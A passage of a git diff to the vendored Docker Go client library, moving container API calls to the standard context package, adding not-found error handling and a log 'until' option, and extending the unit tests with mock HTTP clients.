@@ -25,6 +24,16 @@ func TestContainerStatPathError(t *testing.T) {
 	}
 }
 
+func TestContainerStatPathNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Not found")),
+	}
+	_, err := client.ContainerStatPath(context.Background(), "container_id", "path")
+	if !IsErrNotFound(err) {
+		t.Fatalf("expected a not found error, got %v", err)
+	}
+}
+
 func TestContainerStatPathNoHeaderError(t *testing.T) {
 	client := &Client{
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
@@ -95,6 +104,16 @@ func TestCopyToContainerError(t *testing.T) {
 	}
 }
 
+func TestCopyToContainerNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Not found")),
+	}
+	err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{})
+	if !IsErrNotFound(err) {
+		t.Fatalf("expected a not found error, got %v", err)
+	}
+}
+
 func TestCopyToContainerNotStatusOKError(t *testing.T) {
 	client := &Client{
 		client: newMockClient(errorMock(http.StatusNoContent, "No content")),
@@ -161,6 +180,16 @@ func TestCopyFromContainerError(t *testing.T) {
 	}
 }
 
+func TestCopyFromContainerNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Not found")),
+	}
+	_, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file")
+	if !IsErrNotFound(err) {
+		t.Fatalf("expected a not found error, got %v", err)
+	}
+}
+
 func TestCopyFromContainerNotStatusOKError(t *testing.T) {
 	client := &Client{
 		client: newMockClient(errorMock(http.StatusNoContent, "No content")),
@@ -195,7 +224,7 @@ func TestCopyFromContainer(t *testing.T) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
 			}
 			if req.Method != "GET" {
-				return nil, fmt.Errorf("expected PUT method, got %s", req.Method)
+				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
 			}
 			query := req.URL.Query()
 			path := query.Get("path")
diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go
index 9f627aafa6..d269a61894 100644
--- a/vendor/github.com/docker/docker/client/container_create.go
+++ b/vendor/github.com/docker/docker/client/container_create.go
@@ -1,13 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 	"strings"
 
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/network"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/versions"
 )
 
 type configWrapper struct {
@@ -25,6 +26,11 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config
 		return response, err
 	}
 
+	// When using API 1.24 and under, the client is responsible for removing the container
+	if hostConfig != nil && versions.LessThan(cli.ClientVersion(), "1.25") {
+		hostConfig.AutoRemove = false
+	}
+
 	query := url.Values{}
 	if containerName != "" {
 		query.Set("name", containerName)
@@ -39,7 +45,7 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config
 	serverResp, err := cli.post(ctx, "/containers/create", query, body, nil)
 	if err != nil {
 		if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") {
-			return response, imageNotFoundError{config.Image}
+			return response, objectNotFoundError{object: "image", id: config.Image}
 		}
 		return response, err
 	}
diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go
index 15dbd5ea01..d46e70492d 100644
--- a/vendor/github.com/docker/docker/client/container_create_test.go
+++ b/vendor/github.com/docker/docker/client/container_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/container"
-	"golang.org/x/net/context"
 )
 
 func TestContainerCreateError(t *testing.T) {
@@ -22,7 +22,7 @@ func TestContainerCreateError(t *testing.T) {
 		t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err)
 	}
 
-	// 404 doesn't automagitally means an unknown image
+	// 404 doesn't automatically means an unknown image
 	client = &Client{
 		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
 	}
@@ -37,7 +37,7 @@ func TestContainerCreateImageNotFound(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusNotFound, "No such image")),
 	}
 	_, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown")
-	if err == nil || !IsErrImageNotFound(err) {
+	if err == nil || !IsErrNotFound(err) {
 		t.Fatalf("expected an imageNotFound error, got %v", err)
 	}
 }
@@ -74,3 +74,45 @@ func TestContainerCreateWithName(t *testing.T) {
 		t.Fatalf("expected `container_id`, got %s", r.ID)
 	}
 }
+
+// TestContainerCreateAutoRemove validates that a client using API 1.24 always disables AutoRemove. When using API 1.25
+// or up, AutoRemove should not be disabled.
+func TestContainerCreateAutoRemove(t *testing.T) {
+	autoRemoveValidator := func(expectedValue bool) func(req *http.Request) (*http.Response, error) {
+		return func(req *http.Request) (*http.Response, error) {
+			var config configWrapper
+
+			if err := json.NewDecoder(req.Body).Decode(&config); err != nil {
+				return nil, err
+			}
+			if config.HostConfig.AutoRemove != expectedValue {
+				return nil, fmt.Errorf("expected AutoRemove to be %v, got %v", expectedValue, config.HostConfig.AutoRemove)
+			}
+			b, err := json.Marshal(container.ContainerCreateCreatedBody{
+				ID: "container_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}
+	}
+
+	client := &Client{
+		client:  newMockClient(autoRemoveValidator(false)),
+		version: "1.24",
+	}
+	if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil {
+		t.Fatal(err)
+	}
+	client = &Client{
+		client:  newMockClient(autoRemoveValidator(true)),
+		version: "1.25",
+	}
+	if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go
index 1e3e554fc5..3b7c90c96c 100644
--- a/vendor/github.com/docker/docker/client/container_diff.go
+++ b/vendor/github.com/docker/docker/client/container_diff.go
@@ -1,16 +1,16 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/container"
 )
 
 // ContainerDiff shows differences in a container filesystem since it was started.
-func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) {
-	var changes []types.ContainerChange
+func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]container.ContainerChangeResponseItem, error) {
+	var changes []container.ContainerChangeResponseItem
 
 	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil)
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go
index 1ce1117684..ac215f3403 100644
--- a/vendor/github.com/docker/docker/client/container_diff_test.go
+++ b/vendor/github.com/docker/docker/client/container_diff_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,7 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/container"
 )
 
 func TestContainerDiffError(t *testing.T) {
@@ -31,7 +31,7 @@ func TestContainerDiff(t *testing.T) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
 			}
-			b, err := json.Marshal([]types.ContainerChange{
+			b, err := json.Marshal([]container.ContainerChangeResponseItem{
 				{
 					Kind: 0,
 					Path: "/path/1",
diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go
index 0665c54fbd..535536b1e0 100644
--- a/vendor/github.com/docker/docker/client/container_exec.go
+++ b/vendor/github.com/docker/docker/client/container_exec.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerExecCreate creates a new exec configuration to run an exec process.
@@ -35,7 +35,7 @@ func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config
 // It returns a types.HijackedConnection with the hijacked connection
 // and the a reader to get output. It's up to the called to close
 // the hijacked connection by calling types.HijackedResponse.Close.
-func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) {
+func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) {
 	headers := map[string][]string{"Content-Type": {"application/json"}}
 	return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers)
 }
diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go
index 0e296a50ad..68b900bf14 100644
--- a/vendor/github.com/docker/docker/client/container_exec_test.go
+++ b/vendor/github.com/docker/docker/client/container_exec_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
diff --git a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go
index 52194f3d34..d0c0a5cbad 100644
--- a/vendor/github.com/docker/docker/client/container_export.go
+++ b/vendor/github.com/docker/docker/client/container_export.go
@@ -1,10 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
-
-	"golang.org/x/net/context"
 )
 
 // ContainerExport retrieves the raw contents of a container
diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go
index 5849fe9252..8f6c8dce64 100644
--- a/vendor/github.com/docker/docker/client/container_export_test.go
+++ b/vendor/github.com/docker/docker/client/container_export_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerExportError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go
index 17f1809747..f453064cf8 100644
--- a/vendor/github.com/docker/docker/client/container_inspect.go
+++ b/vendor/github.com/docker/docker/client/container_inspect.go
@@ -1,24 +1,23 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerInspect returns the container information.
 func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) {
+	if containerID == "" {
+		return types.ContainerJSON{}, objectNotFoundError{object: "container", id: containerID}
+	}
 	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return types.ContainerJSON{}, containerNotFoundError{containerID}
-		}
-		return types.ContainerJSON{}, err
+		return types.ContainerJSON{}, wrapResponseError(err, serverResp, "container", containerID)
 	}
 
 	var response types.ContainerJSON
@@ -29,16 +28,16 @@ func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (ty
 
 // ContainerInspectWithRaw returns the container information and its raw representation.
 func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) {
+	if containerID == "" {
+		return types.ContainerJSON{}, nil, objectNotFoundError{object: "container", id: containerID}
+	}
 	query := url.Values{}
 	if getSize {
 		query.Set("size", "1")
 	}
 	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return types.ContainerJSON{}, nil, containerNotFoundError{containerID}
-		}
-		return types.ContainerJSON{}, nil, err
+		return types.ContainerJSON{}, nil, wrapResponseError(err, serverResp, "container", containerID)
 	}
 	defer ensureReaderClosed(serverResp)
 
diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go
index f1a6f4ac7d..92a77f6aea 100644
--- a/vendor/github.com/docker/docker/client/container_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/container_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestContainerInspectError(t *testing.T) {
@@ -30,11 +31,23 @@ func TestContainerInspectContainerNotFound(t *testing.T) {
 	}
 
 	_, err := client.ContainerInspect(context.Background(), "unknown")
-	if err == nil || !IsErrContainerNotFound(err) {
+	if err == nil || !IsErrNotFound(err) {
 		t.Fatalf("expected a containerNotFound error, got %v", err)
 	}
 }
 
+func TestContainerInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.ContainerInspectWithRaw(context.Background(), "", true)
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
+
 func TestContainerInspect(t *testing.T) {
 	expectedURL := "/containers/container_id/json"
 	client := &Client{
@@ -67,10 +80,10 @@ func TestContainerInspect(t *testing.T) {
 		t.Fatalf("expected `container_id`, got %s", r.ID)
 	}
 	if r.Image != "image" {
-		t.Fatalf("expected `image`, got %s", r.ID)
+		t.Fatalf("expected `image`, got %s", r.Image)
 	}
 	if r.Name != "name" {
-		t.Fatalf("expected `name`, got %s", r.ID)
+		t.Fatalf("expected `name`, got %s", r.Name)
 	}
 }
 
@@ -107,10 +120,10 @@ func TestContainerInspectNode(t *testing.T) {
 		t.Fatalf("expected `container_id`, got %s", r.ID)
 	}
 	if r.Image != "image" {
-		t.Fatalf("expected `image`, got %s", r.ID)
+		t.Fatalf("expected `image`, got %s", r.Image)
 	}
 	if r.Name != "name" {
-		t.Fatalf("expected `name`, got %s", r.ID)
+		t.Fatalf("expected `name`, got %s", r.Name)
 	}
 	if r.Node.ID != "container_node_id" {
 		t.Fatalf("expected `container_node_id`, got %s", r.Node.ID)
diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go
index 29f80c73ad..4d6f1d23da 100644
--- a/vendor/github.com/docker/docker/client/container_kill.go
+++ b/vendor/github.com/docker/docker/client/container_kill.go
@@ -1,9 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
-
-	"golang.org/x/net/context"
 )
 
 // ContainerKill terminates the container process but does not remove the container from the docker host.
diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go
index 9477b0abd2..85bb5ee559 100644
--- a/vendor/github.com/docker/docker/client/container_kill_test.go
+++ b/vendor/github.com/docker/docker/client/container_kill_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerKillError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go
index 4398912197..9c218e2218 100644
--- a/vendor/github.com/docker/docker/client/container_list.go
+++ b/vendor/github.com/docker/docker/client/container_list.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // ContainerList returns the list of containers in the docker host.
diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go
index e41c6874b5..809f20f5c7 100644
--- a/vendor/github.com/docker/docker/client/container_list_test.go
+++ b/vendor/github.com/docker/docker/client/container_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,7 +12,6 @@ import (
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 func TestContainerListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go
index 69056b6321..5b6541f035 100644
--- a/vendor/github.com/docker/docker/client/container_logs.go
+++ b/vendor/github.com/docker/docker/client/container_logs.go
@@ -1,18 +1,38 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
 	"time"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/pkg/errors"
 )
 
 // ContainerLogs returns the logs generated by a container in an io.ReadCloser.
 // It's up to the caller to close the stream.
+//
+// The stream format on the response will be in one of two formats:
+//
+// If the container is using a TTY, there is only a single stream (stdout), and
+// data is copied directly from the container output stream, no extra
+// multiplexing or headers.
+//
+// If the container is *not* using a TTY, streams for stdout and stderr are
+// multiplexed.
+// The format of the multiplexed stream is as follows:
+//
+//    [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT}
+//
+// STREAM_TYPE can be 1 for stdout and 2 for stderr
+//
+// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian.
+// This is the size of OUTPUT.
+//
+// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this
+// stream.
 func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) {
 	query := url.Values{}
 	if options.ShowStdout {
@@ -26,11 +46,19 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options
 	if options.Since != "" {
 		ts, err := timetypes.GetTimestamp(options.Since, time.Now())
 		if err != nil {
-			return nil, err
+			return nil, errors.Wrap(err, `invalid value for "since"`)
 		}
 		query.Set("since", ts)
 	}
 
+	if options.Until != "" {
+		ts, err := timetypes.GetTimestamp(options.Until, time.Now())
+		if err != nil {
+			return nil, errors.Wrap(err, `invalid value for "until"`)
+		}
+		query.Set("until", ts)
+	}
+
 	if options.Timestamps {
 		query.Set("timestamps", "1")
 	}
@@ -46,7 +74,7 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options
 
 	resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil)
 	if err != nil {
-		return nil, err
+		return nil, wrapResponseError(err, resp, "container", container)
 	}
 	return resp.body, nil
 }
diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go
index 99e31842c9..6d6e34e101 100644
--- a/vendor/github.com/docker/docker/client/container_logs_test.go
+++ b/vendor/github.com/docker/docker/client/container_logs_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -13,24 +14,34 @@ import (
 	"time"
 
 	"github.com/docker/docker/api/types"
-
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestContainerLogsNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Not found")),
+	}
+	_, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{})
+	if !IsErrNotFound(err) {
+		t.Fatalf("expected a not found error, got %v", err)
+	}
+}
+
 func TestContainerLogsError(t *testing.T) {
 	client := &Client{
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 	_, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{})
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
-	}
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
 	_, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{
 		Since: "2006-01-02TZ",
 	})
-	if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) {
-		t.Fatalf("expected a 'parsing time' error, got %v", err)
-	}
+	assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`))
+	_, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{
+		Until: "2006-01-02TZ",
+	})
+	assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`))
 }
 
 func TestContainerLogs(t *testing.T) {
@@ -38,6 +49,7 @@ func TestContainerLogs(t *testing.T) {
 	cases := []struct {
 		options             types.ContainerLogsOptions
 		expectedQueryParams map[string]string
+		expectedError       string
 	}{
 		{
 			expectedQueryParams: map[string]string{
@@ -71,21 +83,44 @@ func TestContainerLogs(t *testing.T) {
 		},
 		{
 			options: types.ContainerLogsOptions{
-				// An complete invalid date, timestamp or go duration will be
-				// passed as is
-				Since: "invalid but valid",
+				// timestamp will be passed as is
+				Since: "1136073600.000000001",
+			},
+			expectedQueryParams: map[string]string{
+				"tail":  "",
+				"since": "1136073600.000000001",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				// timestamp will be passed as is
+				Until: "1136073600.000000001",
 			},
 			expectedQueryParams: map[string]string{
 				"tail":  "",
-				"since": "invalid but valid",
+				"until": "1136073600.000000001",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				// An complete invalid date will not be passed
+				Since: "invalid value",
 			},
+			expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`,
+		},
+		{
+			options: types.ContainerLogsOptions{
+				// An complete invalid date will not be passed
+				Until: "invalid value",
+			},
+			expectedError: `invalid value for "until": failed to parse value as time or duration: "invalid value"`,
 		},
 	}
 	for _, logCase := range cases {
 		client := &Client{
 			client: newMockClient(func(r *http.Request) (*http.Response, error) {
 				if !strings.HasPrefix(r.URL.Path, expectedURL) {
-					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+					return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL)
 				}
 				// Check query parameters
 				query := r.URL.Query()
@@ -102,17 +137,15 @@ func TestContainerLogs(t *testing.T) {
 			}),
 		}
 		body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options)
-		if err != nil {
-			t.Fatal(err)
+		if logCase.expectedError != "" {
+			assert.Check(t, is.Error(err, logCase.expectedError))
+			continue
 		}
+		assert.NilError(t, err)
 		defer body.Close()
 		content, err := ioutil.ReadAll(body)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if string(content) != "response" {
-			t.Fatalf("expected response to contain 'response', got %s", string(content))
-		}
+		assert.NilError(t, err)
+		assert.Check(t, is.Contains(string(content), "response"))
 	}
 }
 
diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go
index 412067a782..5e7271a371 100644
--- a/vendor/github.com/docker/docker/client/container_pause.go
+++ b/vendor/github.com/docker/docker/client/container_pause.go
@@ -1,6 +1,6 @@
-package client
+package client // import "github.com/docker/docker/client"
 
-import "golang.org/x/net/context"
+import "context"
 
 // ContainerPause pauses the main process of a given container without terminating it.
 func (cli *Client) ContainerPause(ctx context.Context, containerID string) error {
diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go
index 0ee2f05d7e..d1f73a67f3 100644
--- a/vendor/github.com/docker/docker/client/container_pause_test.go
+++ b/vendor/github.com/docker/docker/client/container_pause_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestContainerPauseError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go
index b582170867..14f88d93ba 100644
--- a/vendor/github.com/docker/docker/client/container_prune.go
+++ b/vendor/github.com/docker/docker/client/container_prune.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // ContainersPrune requests the daemon to delete unused data
diff --git a/vendor/github.com/docker/docker/client/container_prune_test.go b/vendor/github.com/docker/docker/client/container_prune_test.go
new file mode 100644
index 0000000000..6a830d01dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_prune_test.go
@@ -0,0 +1,125 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestContainersPruneError(t *testing.T) {
+	client := &Client{
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+	}
+
+	filters := filters.NewArgs()
+
+	_, err := client.ContainersPrune(context.Background(), filters)
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
+}
+
+func TestContainersPrune(t *testing.T) {
+	expectedURL := "/v1.25/containers/prune"
+
+	danglingFilters := filters.NewArgs()
+	danglingFilters.Add("dangling", "true")
+
+	noDanglingFilters := filters.NewArgs()
+	noDanglingFilters.Add("dangling", "false")
+
+	danglingUntilFilters := filters.NewArgs()
+	danglingUntilFilters.Add("dangling", "true")
+	danglingUntilFilters.Add("until", "2016-12-15T14:00")
+
+	labelFilters := filters.NewArgs()
+	labelFilters.Add("dangling", "true")
+	labelFilters.Add("label", "label1=foo")
+	labelFilters.Add("label", "label2!=bar")
+
+	listCases := []struct {
+		filters             filters.Args
+		expectedQueryParams map[string]string
+	}{
+		{
+			filters: filters.Args{},
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": "",
+			},
+		},
+		{
+			filters: danglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true}}`,
+			},
+		},
+		{
+			filters: danglingUntilFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true},"until":{"2016-12-15T14:00":true}}`,
+			},
+		},
+		{
+			filters: noDanglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"false":true}}`,
+			},
+		},
+		{
+			filters: labelFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					assert.Check(t, is.Equal(expected, actual))
+				}
+				content, err := json.Marshal(types.ContainersPruneReport{
+					ContainersDeleted: []string{"container_id1", "container_id2"},
+					SpaceReclaimed:    9999,
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+			version: "1.25",
+		}
+
+		report, err := client.ContainersPrune(context.Background(), listCase.filters)
+		assert.Check(t, err)
+		assert.Check(t, is.Len(report.ContainersDeleted, 2))
+		assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go
index 3a79590ced..ab4cfc16f8 100644
--- a/vendor/github.com/docker/docker/client/container_remove.go
+++ b/vendor/github.com/docker/docker/client/container_remove.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerRemove kills and removes a container from the docker host.
@@ -23,5 +23,5 @@ func (cli *Client) ContainerRemove(ctx context.Context, containerID string, opti
 
